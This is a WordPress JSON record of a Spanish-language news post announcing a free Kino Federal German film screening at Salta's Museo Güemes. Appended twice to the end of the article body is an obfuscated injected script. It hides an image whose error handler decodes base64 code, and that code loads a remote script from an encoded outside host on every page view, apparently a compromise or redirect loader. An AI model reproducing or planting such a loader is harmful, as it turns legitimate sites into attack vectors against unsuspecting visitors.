{"id":2779,"date":"2023-06-27T10:08:45","date_gmt":"2023-06-27T13:08:45","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2779"},"modified":"2025-08-14T00:14:09","modified_gmt":"2025-08-14T03:14:09","slug":"kino-federal-el-ciclo-de-cine-aleman-continua-en-museo-guemes-manana","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2779","title":{"rendered":"Kino Federal: El ciclo de cine alem\u00e1n contin\u00faa en Museo G\u00fcemes"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#c40938\"><em>El cine alem\u00e1n recorrer\u00e1 el pa\u00eds y en Salta la sede ser\u00e1 el museo ubicado en Espa\u00f1a 730. El proyecto est\u00e1 organizado por el Goethe-Institut en colaboraci\u00f3n con el INCAA y la Secretar\u00eda de Cultura.<\/em><\/h4>\n\n\n\n<p>El Goethe-Institut Buenos Aires lanza en junio Kino Federal, un ciclo de cine alem\u00e1n que recorrer\u00e1 durante 2023 distintos puntos de la Argentina con la colaboraci\u00f3n con el INCAA, la Secretar\u00eda de Cultura de la Provincia de Salta a trav\u00e9s de la Direcci\u00f3n de Audiovisuales y el Museo G\u00fcemes, el Museo Nacional de Bellas Artes de la Municipalidad de Neuqu\u00e9n, la Municipalidad de Puerto Rico, el Instituto de Artes Audiovisuales de Misiones y el Cine Lumi\u00e8re de la Municipalidad de Rosario.<\/p>\n\n\n\n<p>Este proyecto se suma a otros ciclos que la Cinemateca del Goethe-Institut organiza regularmente en todo el pa\u00eds. Las pel\u00edculas seleccionadas por el Goethe-Institut ponen en escena, con fuerte sello autoral, tem\u00e1ticas que nos interpelan, como la lucha por cambio clim\u00e1tico y la libertad de expresi\u00f3n, las infancias, el bullying, la manipulaci\u00f3n de la informaci\u00f3n que circula en internet, la migraci\u00f3n, y la perspectiva de g\u00e9nero. Cada mes, las provincias tendr\u00e1n una oportunidad para descubrir otro cine alem\u00e1n.<\/p>\n\n\n\n<p>Hoy martes 27, en el auditorio del Museo G\u00fcemes, tendr\u00e1 lugar la segunda funci\u00f3n del ciclo con la pel\u00edcula \u00abMi final. Tu comienzo\u00bb.<\/p>\n\n\n\n<p>Un emocionante drama rom\u00e1ntico y policial dirigido por la realizadora Mariko Minoguchi. Nominada a Mejor montaje en los Premios del Cine Alem\u00e1n, 2019<\/p>\n\n\n\n<p>\u00abMi final. Tu comienzo\u00bb De Mariko Minoguchi.<\/p>\n\n\n\n<p>2019 &#8211; 111&#8242;<\/p>\n\n\n\n<p><strong>Sinopsis<\/strong><\/p>\n\n\n\n<p>\u00abLa relatividad dice que el futuro y el pasado tienen la misma validez para el presente\u00bb, afirma el f\u00edsico Aron al principio del film. Poco despu\u00e9s muere en un asalto a un banco en brazos de su novia Nora y la pel\u00edcula demostrar\u00e1 su teor\u00eda de que todo est\u00e1 interconectado.<\/p>\n\n\n\n<p>Trailer de MI FINAL, TU COMIENZO en https:<a href=\"https:\/\/youtu.be\/qlMUxffLPRs\" target=\"_blank\" rel=\"noopener\" title=\"\">\/\/youtu.be\/qlMUxffLPRs<\/a><\/p>\n\n\n\n<p>Hoy martes 27 de junio a las 18,&nbsp;Auditorio del Museo G\u00fcemes &#8211; Espa\u00f1a 730 &#8211; Con entrada gratuita hasta agotar capacidad de sala.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/kino-federal-el-ciclo-de-cine-aleman-continua-en-museo-guemes-maniana-90347\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El cine alem\u00e1n recorrer\u00e1 el pa\u00eds y en Salta la sede ser\u00e1 el museo ubicado en Espa\u00f1a 730. El proyecto est\u00e1 organizado por el Goethe-Institut en colaboraci\u00f3n con el INCAA y la Secretar\u00eda de Cultura. El Goethe-Institut Buenos Aires lanza en junio Kino Federal, un ciclo de cine alem\u00e1n que recorrer\u00e1 durante 2023 distintos puntos [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2780,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,17],"tags":[],"class_list":{"0":"post-2779","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2779"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2779"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2779\/revisions"}],"predecessor-version":[{"id":7045,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2779\/revisions\/7045"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2780"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2779"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2779"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2779"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}